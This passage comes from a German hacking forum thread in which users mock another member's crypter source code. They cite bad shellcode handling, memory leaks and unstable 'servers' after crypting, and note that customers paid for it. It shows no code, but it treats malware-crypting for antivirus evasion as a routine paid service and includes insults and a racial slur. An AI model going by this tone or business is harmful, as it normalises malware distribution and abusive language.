    In LoadResourceData wird außerdem noch memory alloziert und nicht wieder freigegeben.

  4. #3
    Macht&Ehre
    Registriert seit
    24.07.2008
    Beiträge
    657

    Standard

    Schlecht... Sehe eig nicht was so ultramegapolymeta dran ist.
    Die Shellcode implementierung ist einfach nur schlecht, er hätte gleich alles in shellcode umschreiben können...

    Naja M4x labert halt viel wenn der Tag lang ist.

  5. #4
    Anfänger
    Registriert seit
    16.08.2010
    Beiträge
    12

    Standard

    Sagte ich doch immer dass der nix drauf hat und nur Scheisse labert.
    Sieht man ja jetzt an seinem schrottigen Source.

  6. #5
    CIH-Virus Avatar von K-Gee
    Registriert seit
    17.05.2010
    Beiträge
    449

    Standard

    Server war wohl deshalb nach dem Crypten oft unstable :O, schade wegen den kunden... das geld zu investieren in so nen Schei*e lohnt sich nicht (nimms nicht persönlich Tjak)
    same ole nigga.

  7. Folgende Benutzer haben sich für diesen Beitrag bedankt:

    Cyber Tjak (05.10.2010)

Ähnliche Themen

  1. ExeLocker - Opensource PE Protector
    Von Bozok im Forum Delphi
    Antworten: 0
    Letzter Beitrag: 14.08.2010, 13:47
  2. Opensource Func-In Technique
    Von Bozok im Forum Delphi
    Antworten: 4
    Letzter Beitrag: 24.07.2010, 01:41
  3. Opensource rausgriegen?
    Von HaXx im Forum C, C++
    Antworten: 7
    Letzter Beitrag: 22.09.2008, 17:26

Stichworte

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein
  •